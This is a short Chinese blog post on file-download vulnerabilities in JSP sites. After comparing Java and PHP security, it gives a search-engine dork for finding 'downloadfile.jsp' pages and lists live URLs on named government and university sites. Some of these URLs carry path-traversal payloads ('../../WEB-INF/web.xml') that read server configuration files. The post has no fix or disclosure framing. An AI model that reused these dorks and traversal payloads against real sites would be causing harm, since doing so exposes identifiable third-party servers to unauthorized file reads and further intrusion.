JSP下载引发的安全问题
我想大多人都会赞同java的安全性要比其他的高很多,至少是相比php
记得有个网站上面的评价是,天上有多少星星,php的cms就会有多少漏洞,这个其实一点也不夸张,至少我接触到的php程序,没有一个没被黑过,严重的更有整站数据库被黑客down走的情况,前面的blog记录了简单的php漏洞,以及黑客使用植入危险代码的部分,不过恕我才疏学浅,仅能了解到使用,至于如何黑网站的部分知之甚少...
昨天看了一篇帖子,关于jsp漏洞的问题,其实问题也是出在许多古老的系统上面,初学java的人开发的jsp+servlet总会有形形色色的问题让网站的安全性跌入谷底
先说寻找方法,很多coder使用下载文件都喜欢使用 downloadfile这个名字 - 直观,一看就知道这东西是用来下载文件的。
于是度娘搜索:
inurl: (downloadfile.jsp)
http://www.bjld.gov.cn/LDJAPP/zcfg/downloadfile.jsp?src=web.xml&dest=../../WEB-INF/web.xml
http://www.tsinghua.org.cn/alumni/common/downloadFile.jsp?id=0
http://www.wztax.gov.cn/system/FunPages/DownloadFile.jsp?filePath=/UserFile/2007-01/30/%B8%F6%CC%E5%B9%A4%C9%CC%BB%A7%BD%A8%D5%CB%B9%DC%C0%ED%D4%DD%D0%D0%B0%EC%B7%A8.txt&name=%B8%F6%CC%E5%B9%A4%C9%CC%BB%A7%BD%A8%D5%CB%B9%DC%C0%ED%D4%DD%D0%D0%B0%EC%B7%A8.txthttp://www.wztax.gov.cn/system/FunPages/DownloadFile.jsp?filePath=/\.\./\.\./web.xml&name=1.txt
http://jw.djtu.edu.cn/jwzx/common/downloadFile.jsp?id=10780